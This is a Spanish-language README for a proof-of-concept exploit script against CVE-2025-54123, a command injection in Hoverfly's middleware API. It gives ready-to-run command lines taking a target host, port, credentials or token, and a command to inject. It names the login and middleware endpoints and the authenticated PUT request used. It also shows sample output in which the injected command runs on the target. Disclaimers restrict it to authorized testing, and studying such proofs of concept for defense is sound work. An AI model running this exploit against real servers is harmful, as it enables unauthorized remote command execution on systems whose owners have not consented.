
Prueba de concepto en Python para CVE-2025-54123, que demuestra inyección de comandos a RCE en la API de middleware de Hoverfly con autenticación basada en credenciales o tokens.
Este repositorio contiene un script de prueba de concepto (PoC) en Python para interactuar con instancias de Hoverfly afectadas por CVE-2025-54123.
El script soporta:
Advertencia
Este proyecto está destinado únicamente a fines autorizados de investigación de seguridad, pruebas y educativos. No lo utilices contra sistemas sin permiso explícito.
Instalar dependencias:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
Cuando se proporcionan credenciales:
/api/token-auth
El script se comunica con:
/api/v2/hoverfly/middleware
usando una solicitud PUT autenticada.
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
Este repositorio se proporciona únicamente con fines educativos, de seguridad defensiva y de pruebas autorizadas. El autor no asume ninguna responsabilidad por el mal uso, daños o consecuencias legales derivados del uso de este software.
| Argumento | Descripción |
|---|
--target | Dominio o dirección IP objetivo |
--port | Puerto del servicio objetivo |
-u | Nombre de usuario de Hoverfly |
-p | Contraseña de Hoverfly |
--token | Token bearer existente |
--cmd | Cadena de comando suministrada al endpoint middleware |